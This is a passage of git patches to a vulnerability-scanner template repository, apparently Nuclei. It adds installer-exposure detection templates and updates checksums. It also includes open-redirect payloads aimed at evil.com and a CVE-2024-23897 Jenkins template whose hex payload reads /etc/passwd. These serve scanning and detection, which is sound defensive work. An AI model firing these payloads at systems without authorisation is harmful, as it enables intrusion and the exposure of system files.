4a0a004730450220128cfc82d3dff26aed49cee5aa69ca7428cd65495bf2a70cc8d405825af8f976022100bcc76a3c09d698786cd3f8071a590aa9c8b11291474ffc8fb9adf142af9a8929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220128cfc82d3dff26aed49cee5aa69ca7428cd65495bf2a70cc8d405825af8f976022100bcc76a3c09d698786cd3f8071a590aa9c8b11291474ffc8fb9adf142af9a8929:922c64590222798bb761d5b6d8e72950 From ee9bb09d531838e13958f7ef3db3740c73db96a4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 11:49:15 +0000 Subject: [PATCH 522/847] Auto Generated New Template Addition List [Fri May 31 11:49:15 UTC 2024] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index cbe2ef685c..b100cf5ad9 100644 --- a/.new-additions +++ b/.new-additions @@ -20,10 +20,10 @@ http/exposed-panels/oracle-access-management.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml -http/misconfiguration/cubebackup-setup-installer.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/call-com-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml +http/misconfiguration/installer/cubebackup-setup-installer.yaml http/misconfiguration/installer/ejbca-enterprise-installer.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml From d6c16f52b7bf433eefa3b382e146418fae6a76ea Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 11:49:20 +0000 Subject: [PATCH 523/847] Auto Generated Templates Checksum [Fri May 31 11:49:20 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6a73e6a5d5..9992836bb0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4194,7 +4194,7 @@ http/exposed-panels/openwrt/openwrt-luci-panel.yaml:23c9398019d54040ec5ec64239b8 http/exposed-panels/openwrt-login.yaml:99bc6770cd1dd9318d0575323ac32f92e4d8ff88 http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 -http/exposed-panels/oracle-access-management.yaml:e15edb1391bc0c2b106f0f9ea60a307738e7db1d +http/exposed-panels/oracle-access-management.yaml:4891f0dc43e639073cfad415a15f31fba0274ea5 http/exposed-panels/oracle-business-control.yaml:3db90a4292199b50c9375bb0e90a3de3942f9f46 http/exposed-panels/oracle-business-intelligence.yaml:7ae31ff5ddccb3f4a213467b032af88787cf2b49 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 @@ -5313,7 +5313,6 @@ http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0 http/misconfiguration/cookies-without-httponly-secure.yaml:96433be16faef9b269fa66484b578933815e1e51 http/misconfiguration/corebos-htaccess.yaml:c292dd25e289347ac281d4ce493839827da70784 -http/misconfiguration/cubebackup-setup-installer.yaml:1e8262b8451a65083cc49135bb49f64bd33f5cf3 http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce http/misconfiguration/database-error.yaml:dc9ac279976c76b9957baf5076fccd7722d1c9ce @@ -5425,6 +5424,7 @@ http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a2 http/misconfiguration/installer/connectwise-setup.yaml:a027b152c37cfaa8a6dace9f8ad093c294167beb http/misconfiguration/installer/contentify-installer.yaml:349037f164610234a652ec6b38511fd5c5e1d16d http/misconfiguration/installer/cube-105-install.yaml:7d52b05c472422fd5821315b3c801aeacdefcdb0 +http/misconfiguration/installer/cubebackup-setup-installer.yaml:560b0b2093f714f2389df69677c82f956f848123 http/misconfiguration/installer/custom-xoops-installer.yaml:ee8a3bf092cb7c1efd90f278a5ad74e2f4442510 http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3b7ce26012217d959b http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 @@ -8610,7 +8610,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3cb8f160b0577067090d4a32939267a8fc3d7441 +templates-checksum.txt:833cb684623c878f0adebde0ed7d4c39b1a44e48 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d644c46f36cb6a718d506939f58050ecf95f3c34 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 11:50:02 +0000 Subject: [PATCH 524/847] Syncing Templates --- .github/workflows/templates-sync.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5faa2150c9..78ddeba7bb 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -25,10 +25,10 @@ on: - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/iot/netgear-boarddataww-rce.yaml' - - 'http/misconfiguration/cubebackup-setup-installer.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/call-com-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' + - 'http/misconfiguration/installer/cubebackup-setup-installer.yaml' - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' From 986339f584f6a6f161c4da3170b0cebca4c873b8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 31 May 2024 17:53:31 +0530 Subject: [PATCH 525/847] minor update --- http/technologies/sparklighter-detect.yaml | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/http/technologies/sparklighter-detect.yaml b/http/technologies/sparklighter-detect.yaml index 879326d922..95913d9fe2 100644 --- a/http/technologies/sparklighter-detect.yaml +++ b/http/technologies/sparklighter-detect.yaml @@ -4,24 +4,32 @@ info: name: Spark Lighter Detection author: icarot severity: info - description: This nuclei template detects a Spark Lighter server, a REST API for Apache Spark on K8S or YARN. + description: | + Detects a Spark Lighter server, a REST API for Apache Spark on K8S or YARN. classification: cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* metadata: - max-request: 5 - vendor: lighter - product: spark_lighter_server + verified: true + max-request: 1 + vendor: apache + product: spark category: productivity tags: tech,lighter,spark,detect -requests: +http: - method: GET path: - "{{BaseURL}}/lighter/api" - - "{{BaseURL}}/lighter/batches" - - "{{BaseURL}}/lighter/sessions" + matchers-condition: and matchers: + - type: word + part: body + words: + - 'Lighter' + - '/lighter/favicon.svg' + condition: and + - type: status status: - 200 From c2b6ea9a5812d9533e7027d0e4530b246d09e9a5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 31 May 2024 20:03:51 +0530 Subject: [PATCH 526/847] Create orchard-installer.yaml --- .../installer/orchard-installer.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/installer/orchard-installer.yaml diff --git a/http/misconfiguration/installer/orchard-installer.yaml b/http/misconfiguration/installer/orchard-installer.yaml new file mode 100644 index 0000000000..82c5c0e464 --- /dev/null +++ b/http/misconfiguration/installer/orchard-installer.yaml @@ -0,0 +1,34 @@ +id: orchard-installer + +info: + name: Orchard Setup Wizard - Exposure + author: DhiyaneshDK + severity: high + description: | + Orchard is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Orchard Setup - Get Started" + tags: misconfig,exposure,install,orchard + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Orchard Setup - Get Started" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 17a131d3a7150dd17a6f37c4690affbc03114146 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 31 May 2024 20:14:35 +0530 Subject: [PATCH 527/847] Create confluence-installer.yaml --- .../installer/confluence-installer.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/installer/confluence-installer.yaml diff --git a/http/misconfiguration/installer/confluence-installer.yaml b/http/misconfiguration/installer/confluence-installer.yaml new file mode 100644 index 0000000000..ae0049f8ab --- /dev/null +++ b/http/misconfiguration/installer/confluence-installer.yaml @@ -0,0 +1,34 @@ +id: confluence-installer + +info: + name: Confluence Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Confluence is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: title:"Choose your deployment type - Confluence" + tags: misconfig,exposure,install,confluence + +http: + - method: GET + path: + - "{{BaseURL}}/setup/setupcluster-start.action" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Choose your deployment type - Confluence" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 758e1687c627e70fea1859ce5b3d526001fec6eb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 May 2024 22:01:36 +0530 Subject: [PATCH 528/847] Update confluence-installer.yaml --- http/misconfiguration/installer/confluence-installer.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/http/misconfiguration/installer/confluence-installer.yaml b/http/misconfiguration/installer/confluence-installer.yaml index ae0049f8ab..a994a54642 100644 --- a/http/misconfiguration/installer/confluence-installer.yaml +++ b/http/misconfiguration/installer/confluence-installer.yaml @@ -24,11 +24,6 @@ http: words: - "Choose your deployment type - Confluence" - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 3884371be5c00deb99e3442e7c99e16f2883ad9c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 May 2024 22:02:24 +0530 Subject: [PATCH 529/847] Update orchard-installer.yaml --- http/misconfiguration/installer/orchard-installer.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/http/misconfiguration/installer/orchard-installer.yaml b/http/misconfiguration/installer/orchard-installer.yaml index 82c5c0e464..0022be5016 100644 --- a/http/misconfiguration/installer/orchard-installer.yaml +++ b/http/misconfiguration/installer/orchard-installer.yaml @@ -24,11 +24,6 @@ http: words: - "Orchard Setup - Get Started" - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 7bd6dfa0f1b70d934f20d87db6d75db39badb6b6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 16:34:30 +0000 Subject: [PATCH 530/847] Auto Generated New Template Addition List [Fri May 31 16:34:30 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b100cf5ad9..ca7a4539fa 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/iot/netgear-boarddataww-rce.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/call-com-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml +http/misconfiguration/installer/confluence-installer.yaml http/misconfiguration/installer/cubebackup-setup-installer.yaml http/misconfiguration/installer/ejbca-enterprise-installer.yaml http/misconfiguration/installer/flarum-installer.yaml From 3ef452ef898ddfc4c5336e5743208e0c11578c33 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 16:34:34 +0000 Subject: [PATCH 531/847] Auto Generated Templates Checksum [Fri May 31 16:34:34 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9992836bb0..3c09b2b6e4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5421,6 +5421,7 @@ http/misconfiguration/installer/cms-made-simple-installer.yaml:bd77905eec6dd6463 http/misconfiguration/installer/codeigniter-installer.yaml:fd1d80362d9f4c812f2a205c0db51bd4a970afc8 http/misconfiguration/installer/combodo-itop-installer.yaml:a7551d44c75895abdb04ecb2762433101a90a11e http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a221e3f9d836d7e402 +http/misconfiguration/installer/confluence-installer.yaml:bae5eaa3593f1211cd203229f56f1f55f0d9d044 http/misconfiguration/installer/connectwise-setup.yaml:a027b152c37cfaa8a6dace9f8ad093c294167beb http/misconfiguration/installer/contentify-installer.yaml:349037f164610234a652ec6b38511fd5c5e1d16d http/misconfiguration/installer/cube-105-install.yaml:7d52b05c472422fd5821315b3c801aeacdefcdb0 @@ -8610,7 +8611,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:833cb684623c878f0adebde0ed7d4c39b1a44e48 +templates-checksum.txt:c92791826e25e6bb4d0934460ab64d4078eb8fe5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5b0d21482f581bf27991742eafe68f9b3b886dc6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 16:35:14 +0000 Subject: [PATCH 532/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 78ddeba7bb..ff96318147 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -28,6 +28,7 @@ on: - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/call-com-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' + - 'http/misconfiguration/installer/confluence-installer.yaml' - 'http/misconfiguration/installer/cubebackup-setup-installer.yaml' - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' From 05863ecdbac662d036e391b9bedf8f3d232afbc2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 16:35:18 +0000 Subject: [PATCH 533/847] Auto Generated New Template Addition List [Fri May 31 16:35:17 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ca7a4539fa..c290ee6664 100644 --- a/.new-additions +++ b/.new-additions @@ -37,6 +37,7 @@ http/misconfiguration/installer/librenms-installer.yaml http/misconfiguration/installer/mura-cms-setup-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml +http/misconfiguration/installer/orchard-installer.yaml http/misconfiguration/installer/pandora-fms-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml From f40c7fc8605e1338edb0889c841906a73bb2a07d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 16:35:58 +0000 Subject: [PATCH 534/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ff96318147..df3c596f3e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -42,6 +42,7 @@ on: - 'http/misconfiguration/installer/mura-cms-setup-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' + - 'http/misconfiguration/installer/orchard-installer.yaml' - 'http/misconfiguration/installer/pandora-fms-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' From f380070c3f23f9d0548c30379a3b4cdd96239a01 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 16:36:23 +0000 Subject: [PATCH 535/847] Auto Template Signing [Fri May 31 16:36:23 UTC 2024] :robot: --- http/misconfiguration/installer/confluence-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/confluence-installer.yaml b/http/misconfiguration/installer/confluence-installer.yaml index a994a54642..99fb95b541 100644 --- a/http/misconfiguration/installer/confluence-installer.yaml +++ b/http/misconfiguration/installer/confluence-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402207edd0df973d23b38b3f4fff8520842ab5422e818a3f7c1d14158099a31b4d52c022052c40e94c34255ea723f552adc84040331acb8af45ba05207e24b487c9b3722b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 95dc53c1279795021021d41851e297a5aec52a70 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 May 2024 22:36:15 +0530 Subject: [PATCH 536/847] Fix FP open-redirect-generic.yaml --- http/vulnerabilities/generic/open-redirect-generic.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/generic/open-redirect-generic.yaml b/http/vulnerabilities/generic/open-redirect-generic.yaml index a0b0cc557c..f7efaed7db 100644 --- a/http/vulnerabilities/generic/open-redirect-generic.yaml +++ b/http/vulnerabilities/generic/open-redirect-generic.yaml @@ -47,7 +47,7 @@ http: - '//%69%6e%74%65%72%61%63%74%2e%73%68' - '//evil.com@//' - '//evil.com\tevil.com/' - - '//https://evil.com@//' + - '//https://evil.com//' - '/<>//evil.com' - '/\/\/evil.com/' - '/\/evil.com' @@ -113,6 +113,7 @@ http: - 'login?to=http://evil.com' - '1/_https@evil.com' - 'redirect?targeturl=https://evil.com' + stop-at-first-match: true matchers-condition: and @@ -129,4 +130,4 @@ http: - 307 - 308 condition: or -# digest: 490a00463044022054ed0947b0a6d1ee1a622b5540cae6cf6b8181b8954dcac42c504a043329693202200f69ee46e7dba593696f9f0d815c35fbe5e04cb287c702b1ad72efcf152611e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054ed0947b0a6d1ee1a622b5540cae6cf6b8181b8954dcac42c504a043329693202200f69ee46e7dba593696f9f0d815c35fbe5e04cb287c702b1ad72efcf152611e2:922c64590222798bb761d5b6d8e72950 From ff99ea68a6d2c1e77619c44dbffc1204ce4b8489 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 17:38:04 +0000 Subject: [PATCH 537/847] Auto Generated Templates Checksum [Fri May 31 17:38:04 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3c09b2b6e4..abef2ce698 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5421,7 +5421,7 @@ http/misconfiguration/installer/cms-made-simple-installer.yaml:bd77905eec6dd6463 http/misconfiguration/installer/codeigniter-installer.yaml:fd1d80362d9f4c812f2a205c0db51bd4a970afc8 http/misconfiguration/installer/combodo-itop-installer.yaml:a7551d44c75895abdb04ecb2762433101a90a11e http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a221e3f9d836d7e402 -http/misconfiguration/installer/confluence-installer.yaml:bae5eaa3593f1211cd203229f56f1f55f0d9d044 +http/misconfiguration/installer/confluence-installer.yaml:47ce659af22841bbb50dd4b2aa4c950f10418da8 http/misconfiguration/installer/connectwise-setup.yaml:a027b152c37cfaa8a6dace9f8ad093c294167beb http/misconfiguration/installer/contentify-installer.yaml:349037f164610234a652ec6b38511fd5c5e1d16d http/misconfiguration/installer/cube-105-install.yaml:7d52b05c472422fd5821315b3c801aeacdefcdb0 @@ -5494,6 +5494,7 @@ http/misconfiguration/installer/openshift-installer-panel.yaml:280afbeb89c73b366 http/misconfiguration/installer/opensis-installer.yaml:8a0c4bf9bb56f866b4b4d3d0f4eb97837d4436fc http/misconfiguration/installer/orangehrm-installer.yaml:b585a129ce905a7583bc1344de4f0909c28bedbc http/misconfiguration/installer/orangescrum-install.yaml:a8eed9d3051fb349be44b0cc1dddc1e0faa37d50 +http/misconfiguration/installer/orchard-installer.yaml:0b14209c229e659f303e8daad41e2f7eda6ddbe3 http/misconfiguration/installer/owncloud-installer-exposure.yaml:66cb802db3587a09427dc183b8df0e94ca3fe2d8 http/misconfiguration/installer/oxid-eshop-installer.yaml:f5a2e54a7f5c13e18209df8cb2830e095c83ba5c http/misconfiguration/installer/pagekit-installer.yaml:eb1972138f70ad53ae1b4ef6f5004d9470fdaee6 @@ -7606,7 +7607,7 @@ http/vulnerabilities/generic/generic-windows-lfi.yaml:ddcb321d2bb5e3e9bee57a6593 http/vulnerabilities/generic/host-header-injection.yaml:827f0694d3294d945da80d2dd7aa2ed3e820fc68 http/vulnerabilities/generic/oob-header-based-interaction.yaml:2cac39750dee5c610c6c1023a6fa0c73199e66ec http/vulnerabilities/generic/oob-param-based-interaction.yaml:635728a0bd7fbecc745a2be8d7a51b02ed0ee57b -http/vulnerabilities/generic/open-redirect-generic.yaml:5dbf91e1a6986d4611a6dba2be2d48e0cf80bbd9 +http/vulnerabilities/generic/open-redirect-generic.yaml:b9579f44cf441d40efd816759d26ef4b85cfe8c2 http/vulnerabilities/generic/request-based-interaction.yaml:d3d7eaea6c38c5463861075a7542ed9c7e8f119e http/vulnerabilities/generic/top-xss-params.yaml:3e9a7e3fa96022f53af19ddd617225731c3bd9df http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml:0a058b056b1584bc9de28df14baa9b57be220e88 @@ -8611,7 +8612,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c92791826e25e6bb4d0934460ab64d4078eb8fe5 +templates-checksum.txt:e9b7ab6b37d090554480984f389267ae1c7150ac wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 11e4ce2a0e77574f22e648ce3509ac5c0dfa27f2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 17:40:57 +0000 Subject: [PATCH 539/847] Auto Template Signing [Fri May 31 17:40:57 UTC 2024] :robot: --- http/misconfiguration/installer/orchard-installer.yaml | 1 + http/vulnerabilities/generic/open-redirect-generic.yaml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/installer/orchard-installer.yaml b/http/misconfiguration/installer/orchard-installer.yaml index 0022be5016..a5d2de7897 100644 --- a/http/misconfiguration/installer/orchard-installer.yaml +++ b/http/misconfiguration/installer/orchard-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100d895c9a6b7eae3ff7310c91ec1fdab546ffc9eceb6f728df20a5bf1a58af1bde022100bbf55f6f5a08d0e6f7908a8f8a43a84cfd8626290c8bb0b310e192dea72563dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/generic/open-redirect-generic.yaml b/http/vulnerabilities/generic/open-redirect-generic.yaml index f7efaed7db..10879db292 100644 --- a/http/vulnerabilities/generic/open-redirect-generic.yaml +++ b/http/vulnerabilities/generic/open-redirect-generic.yaml @@ -130,4 +130,4 @@ http: - 307 - 308 condition: or -# digest: 490a00463044022054ed0947b0a6d1ee1a622b5540cae6cf6b8181b8954dcac42c504a043329693202200f69ee46e7dba593696f9f0d815c35fbe5e04cb287c702b1ad72efcf152611e2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f4fe9201a11ea90485c2a26c406a0dbecb9ea8e674bf3ccbcaf01ed4c57421c3022100a9c075d4a231b4acd4adfce87b2f858c65cb9dc3b896d7b07759c4395e0be18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3d3fb8987950e47315ff58d04f5a74e3384d3f31 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 31 May 2024 23:11:54 +0530 Subject: [PATCH 540/847] Create easy-wi-installer.yaml --- .../installer/easy-wi-installer.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/installer/easy-wi-installer.yaml diff --git a/http/misconfiguration/installer/easy-wi-installer.yaml b/http/misconfiguration/installer/easy-wi-installer.yaml new file mode 100644 index 0000000000..4f4691b875 --- /dev/null +++ b/http/misconfiguration/installer/easy-wi-installer.yaml @@ -0,0 +1,34 @@ +id: easy-wi-installer + +info: + name: Easy-WI Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Easy-WI is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + fofa-query: body="Easy-WI Installer" + tags: misconfig,exposure,install,easy-wi + +http: + - method: GET + path: + - "{{BaseURL}}/install/install.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Welcome to the Easy-WI installer!" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From b928cbb52bd94db3b5518bbf8dffd2493a3ebf38 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 31 May 2024 22:28:18 +0400 Subject: [PATCH 541/847] Update CVE-2024-23897.yaml --- javascript/cves/2024/CVE-2024-23897.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/javascript/cves/2024/CVE-2024-23897.yaml b/javascript/cves/2024/CVE-2024-23897.yaml index 1ce87d12b2..8c59f424b6 100644 --- a/javascript/cves/2024/CVE-2024-23897.yaml +++ b/javascript/cves/2024/CVE-2024-23897.yaml @@ -25,7 +25,8 @@ info: vendor: jenkins product: jenkins shodan-query: "product:\"Jenkins\"" - tags: cve,cve2024,lfi,rce,jenkins + tags: cve,cve2024,lfi,rce,jenkins,js + variables: payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}" @@ -53,4 +54,4 @@ javascript: group: 1 regex: - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 From 775834d330cbded14f3bc1346f34dd725b83fdbe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 18:28:48 +0000 Subject: [PATCH 543/847] Auto Generated Templates Checksum [Fri May 31 18:28:48 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index abef2ce698..087ffde753 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5494,7 +5494,7 @@ http/misconfiguration/installer/openshift-installer-panel.yaml:280afbeb89c73b366 http/misconfiguration/installer/opensis-installer.yaml:8a0c4bf9bb56f866b4b4d3d0f4eb97837d4436fc http/misconfiguration/installer/orangehrm-installer.yaml:b585a129ce905a7583bc1344de4f0909c28bedbc http/misconfiguration/installer/orangescrum-install.yaml:a8eed9d3051fb349be44b0cc1dddc1e0faa37d50 -http/misconfiguration/installer/orchard-installer.yaml:0b14209c229e659f303e8daad41e2f7eda6ddbe3 +http/misconfiguration/installer/orchard-installer.yaml:0a64e771b7562362bb57355e673c0dd87c5b0e86 http/misconfiguration/installer/owncloud-installer-exposure.yaml:66cb802db3587a09427dc183b8df0e94ca3fe2d8 http/misconfiguration/installer/oxid-eshop-installer.yaml:f5a2e54a7f5c13e18209df8cb2830e095c83ba5c http/misconfiguration/installer/pagekit-installer.yaml:eb1972138f70ad53ae1b4ef6f5004d9470fdaee6 @@ -7607,7 +7607,7 @@ 